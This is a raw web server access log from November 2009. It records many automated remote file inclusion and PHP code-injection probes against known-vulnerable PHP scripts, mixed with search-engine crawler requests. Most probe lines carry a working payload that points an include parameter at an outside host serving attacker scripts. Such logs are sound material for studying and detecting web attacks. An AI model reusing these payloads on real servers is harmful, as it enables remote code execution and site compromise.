201.218.228.226 - - [13/Nov/2009:19:57:56 -0600] "GET /logs/access_log.1248134400//components/com_forum/download.php?phpbb_root_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
207.58.164.77 - - [13/Nov/2009:19:58:13 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://217.73.168.38/sentra/images/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 307 "-""-"
207.58.164.77 - - [13/Nov/2009:19:58:14 -0600] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://217.73.168.38/sentra/images/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 312 "-""-"
65.55.106.183 - - [13/Nov/2009:19:58:25 -0600] "GET /logs/access_log.1230681600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.58.164.77 - - [13/Nov/2009:20:01:06 -0600] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://217.73.168.38/sentra/images/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 340 "-""-"
207.58.164.77 - - [13/Nov/2009:20:01:07 -0600] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://217.73.168.38/sentra/images/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 335 "-""-"
65.55.207.132 - - [13/Nov/2009:20:08:07 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.132 - - [13/Nov/2009:20:09:27 -0600] "GET /logs/access_log.1172102400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.181 - - [13/Nov/2009:20:12:25 -0600] "GET /logs/access_log.1188259200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.222.86.19 - - [13/Nov/2009:20:13:54 -0600] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.timbaslot.com/stats/stats1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
210.222.86.19 - - [13/Nov/2009:20:13:56 -0600] "GET /logs/access_log.1236384000//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.timbaslot.com/stats/stats1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
210.222.86.19 - - [13/Nov/2009:20:13:56 -0600] "GET /logs/access_log.1238630400//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.timbaslot.com/stats/stats1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
210.222.86.19 - - [13/Nov/2009:20:13:56 -0600] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.timbaslot.com/stats/stats1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
41.202.80.121 - - [13/Nov/2009:20:15:19 -0600] "GET /logs/access_log.1238112000//include/new-visitor.inc.php?lvc_include_dir=http://www.my-school24.de/files/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.831"
41.202.80.121 - - [13/Nov/2009:20:15:20 -0600] "GET //include/new-visitor.inc.php?lvc_include_dir=http://www.my-school24.de/files/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.831"
41.202.80.121 - - [13/Nov/2009:20:15:20 -0600] "GET /logs//include/new-visitor.inc.php?lvc_include_dir=http://www.my-school24.de/files/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.831"
207.58.164.77 - - [13/Nov/2009:20:16:18 -0600] "GET //protection.php?action=logout&siteurl=http://217.73.168.38/sentra/images/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 298 "-""-"
216.199.232.112 - - [13/Nov/2009:20:20:13 -0600] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:20:20:13 -0600] "GET /logs/access_log.1230163200//bookmark4u/lostpasswd.php?env[include_prefix]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:20:20:13 -0600] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:20:20:13 -0600] "GET /logs/access_log.1236902400//bookmark4u/lostpasswd.php?env[include_prefix]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:20:20:20 -0600] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:20:20:20 -0600] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:20:20:20 -0600] "GET /logs/access_log.1230163200//bookmark4u/lostpasswd.php?env[include_prefix]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:20:20:21 -0600] "GET /logs/access_log.1236902400//bookmark4u/lostpasswd.php?env[include_prefix]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.207.94 - - [13/Nov/2009:20:21:25 -0600] "GET /logs/access_log.1201737600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.222.86.19 - - [13/Nov/2009:20:23:35 -0600] "GET /skin/zero_vote/setup.php?dir=http://www.timbaslot.com/stats/stats1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
210.222.86.19 - - [13/Nov/2009:20:23:35 -0600] "GET /logs/access_log.1231718400/skin/zero_vote/setup.php?dir=http://www.timbaslot.com/stats/stats1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.222.86.19 - - [13/Nov/2009:20:23:36 -0600] "GET /logs/skin/zero_vote/setup.php?dir=http://www.timbaslot.com/stats/stats1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
210.222.86.19 - - [13/Nov/2009:20:23:36 -0600] "GET /logs/access_log.1234224000/skin/zero_vote/setup.php?dir=http://www.timbaslot.com/stats/stats1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.106.207 - - [13/Nov/2009:20:23:56 -0600] "GET /logs/access_log.1159315200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
204.202.2.23 - - [13/Nov/2009:20:23:59 -0600] "GET /error.php?dir=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
204.202.2.23 - - [13/Nov/2009:20:23:59 -0600] "GET /logs/error.php?dir=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
204.202.2.23 - - [13/Nov/2009:20:23:59 -0600] "GET /logs/access_log.1250553600/error.php?dir=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:20:24:07 -0600] "GET /logs//error.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:20:24:07 -0600] "GET //error.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:20:24:07 -0600] "GET /logs/access_log.1252627200//error.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
204.202.2.23 - - [13/Nov/2009:20:24:08 -0600] "GET /logs/access_log.1254009600/error.php?dir=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:20:24:10 -0600] "GET /logs/access_log.1252627200//error.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:20:24:11 -0600] "GET //error.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:20:24:11 -0600] "GET /logs//error.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:20:24:11 -0600] "GET /logs/access_log.1253404800//error.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:20:24:23 -0600] "GET /logs/access_log.1253404800//error.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.80.193.43 - - [13/Nov/2009:20:29:56 -0600] "GET /logs/access_log.1216512000 HTTP/1.0" 200 57279 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {30377ED9-AF7C-4B03-8A09-EB283D60689E}; SV1; SU 2.010; .NET CLR 1.0.3705)"
62.103.31.24 - - [13/Nov/2009:20:30:51 -0600] "GET /logs/access_log.1235779200/?//////////////send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.103.31.24 - - [13/Nov/2009:20:30:51 -0600] "GET /?//////////////send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
62.103.31.24 - - [13/Nov/2009:20:30:51 -0600] "GET /logs/access_log.1235433600/?//////////////send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.103.31.24 - - [13/Nov/2009:20:30:54 -0600] "GET /logs/?//////////////send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 212720 "-""Mozilla/5.0"
208.80.193.43 - - [13/Nov/2009:20:32:53 -0600] "GET /logs/access_log.1205971200 HTTP/1.0" 200 150636 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MaxiFiles; SV1)"
65.55.207.95 - - [13/Nov/2009:20:33:25 -0600] "GET /_vti_cnf/ HTTP/1.1" 200 676 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.222.86.19 - - [13/Nov/2009:20:42:55 -0600] "GET /logs/access_log.1241222400//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.timbaslot.com/stats/stats1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
210.222.86.19 - - [13/Nov/2009:20:42:56 -0600] "GET /logs/access_log.1236643200//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.timbaslot.com/stats/stats1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:20:44:48 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:20:44:48 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:20:44:48 -0600] "GET /logs/access_log.1249689600/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:20:44:49 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:20:44:49 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:20:44:49 -0600] "GET /logs/access_log.1249689600/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:20:44:53 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:20:44:53 -0600] "GET /logs/access_log.1249689600/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:20:44:53 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:20:45:12 -0600] "GET /logs/access_log.1245628800/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:20:45:18 -0600] "GET /logs/access_log.1245628800/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:20:45:20 -0600] "GET /logs/access_log.1245628800/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
65.55.106.159 - - [13/Nov/2009:20:45:25 -0600] "GET /logs/access_log.1135641600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.159 - - [13/Nov/2009:20:50:54 -0600] "GET /logs/access_log.1176422400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.213.177.58 - - [13/Nov/2009:20:55:49 -0600] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
74.213.177.58 - - [13/Nov/2009:20:55:49 -0600] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
74.213.177.58 - - [13/Nov/2009:20:55:56 -0600] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
74.213.177.58 - - [13/Nov/2009:20:55:56 -0600] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
67.227.134.140 - - [13/Nov/2009:21:00:31 -0600] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:21:00:31 -0600] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:21:00:31 -0600] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:21:00:50 -0600] "GET /logs/error.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:21:00:50 -0600] "GET /error.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:21:00:50 -0600] "GET /logs/access_log.1231718400/error.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:01:32 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://babem.net/zfxid1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:01:32 -0600] "GET /logs/access_log.1238371200//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://babem.net/zfxid1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:01:32 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://babem.net/zfxid1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:01:41 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://babem.net/zfxid1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:01:41 -0600] "GET /logs/access_log.1238371200//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://babem.net/zfxid1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:01:41 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://babem.net/zfxid1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:10:38 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://babem.net/zfxid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:10:38 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://babem.net/zfxid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:10:38 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://babem.net/zfxid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:10:38 -0600] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://babem.net/zfxid1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:10:38 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://babem.net/zfxid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:10:38 -0600] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://babem.net/zfxid1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:21:10:41 -0600] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:21:11:32 -0600] "GET /logs/access_log.1240790400/error.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:14:26 -0600] "GET /logs/access_log.1233446400%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://babem.net/zfxid1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:15:19 -0600] "GET /logs/access_log.1233446400%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://babem.net/zfxid1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:15:35 -0600] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://babem.net/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:15:35 -0600] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://babem.net/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:16:04 -0600] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://babem.net/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:16:04 -0600] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://babem.net/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.58.164.77 - - [13/Nov/2009:21:17:35 -0600] "GET /protection.php?action=logout&siteurl=http://217.73.168.38/sentra/images/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 297 "-""-"
207.58.164.77 - - [13/Nov/2009:21:17:35 -0600] "GET /logs/protection.php?action=logout&siteurl=http://217.73.168.38/sentra/images/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 302 "-""-"
65.55.107.180 - - [13/Nov/2009:21:18:55 -0600] "GET /logs/access_log.1114992000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.34.111.74 - - [13/Nov/2009:21:20:48 -0600] "GET /logs/access_log.1229385600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://babem.net/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:20:55 -0600] "GET /logs/access_log.1229385600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://babem.net/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
93.132.171.173 - - [13/Nov/2009:21:22:43 -0600] "GET /robots.txt HTTP/1.0" 404 281 "http://majestic12.co.uk/bot.php?I=7EBE7DED3E-209D77060277AD99-fortpit_pconline_com""Mozilla/5.0 (compatible; MJ12bot/v1.3.1; http://www.majestic12.co.uk/bot.php?+)"
93.132.171.173 - - [13/Nov/2009:21:22:44 -0600] "GET /logs/access_log.1227657600 HTTP/1.1" 200 13131 "http://www.aerospaceacademy.org/index/click?url=http://fortpit.pconline.com/logs/access_log.1227657600&query_id=132583&lang=""Mozilla/5.0 (compatible; MJ12bot/v1.3.1; http://www.majestic12.co.uk/bot.php?+)"
87.139.66.104 - - [13/Nov/2009:21:23:54 -0600] "GET /logs/setup.php?dir=http://fusiongrafix.net/button2G.jpg?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
87.139.66.104 - - [13/Nov/2009:21:23:54 -0600] "GET /logs/access_log.1250553600/setup.php?dir=http://fusiongrafix.net/button2G.jpg?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
87.139.66.104 - - [13/Nov/2009:21:23:54 -0600] "GET /setup.php?dir=http://fusiongrafix.net/button2G.jpg?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
210.98.146.166 - - [13/Nov/2009:21:24:26 -0600] "GET /logs/access_log.1250553600/setup.php?dir=http://fusiongrafix.net/button2G.jpg?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
210.98.146.166 - - [13/Nov/2009:21:24:26 -0600] "GET /logs/setup.php?dir=http://fusiongrafix.net/button2G.jpg?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
210.98.146.166 - - [13/Nov/2009:21:24:27 -0600] "GET /setup.php?dir=http://fusiongrafix.net/button2G.jpg?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
207.58.164.77 - - [13/Nov/2009:21:24:55 -0600] "GET //?cmd&file=http://217.73.168.38/sentra/images/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 200 3245 "-""-"
207.58.164.77 - - [13/Nov/2009:21:25:29 -0600] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://217.73.168.38/sentra/images/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 331 "-""-"
207.58.164.77 - - [13/Nov/2009:21:25:31 -0600] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://217.73.168.38/sentra/images/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 326 "-""-"
87.139.66.104 - - [13/Nov/2009:21:26:21 -0600] "GET /logs/access_log.1253491200/setup.php?dir=http://fusiongrafix.net/button2G.jpg?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.55.106.115 - - [13/Nov/2009:21:27:25 -0600] "GET /logs/access_log.1233273600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.171.190.107 - - [13/Nov/2009:21:27:26 -0600] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:27:27 -0600] "GET /logs/access_log.1253491200//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:27:27 -0600] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:27:35 -0600] "GET /logs/access_log.1234569600//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:27:54 -0600] "GET /logs/access_log.1238371200%20%20//pollphp/textfile//admin/common.inc.php?base_path=http://babem.net/zfxid1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:27:54 -0600] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=http://babem.net/zfxid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:27:54 -0600] "GET //pollphp/textfile//admin/common.inc.php?base_path=http://babem.net/zfxid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:27:55 -0600] "GET //pollphp/textfile//admin/common.inc.php?base_path=http://babem.net/zfxid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:27:55 -0600] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=http://babem.net/zfxid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:27:55 -0600] "GET /logs/access_log.1238371200%20%20//pollphp/textfile//admin/common.inc.php?base_path=http://babem.net/zfxid1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
65.55.207.69 - - [13/Nov/2009:21:27:55 -0600] "GET /logs/access_log.1109030400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
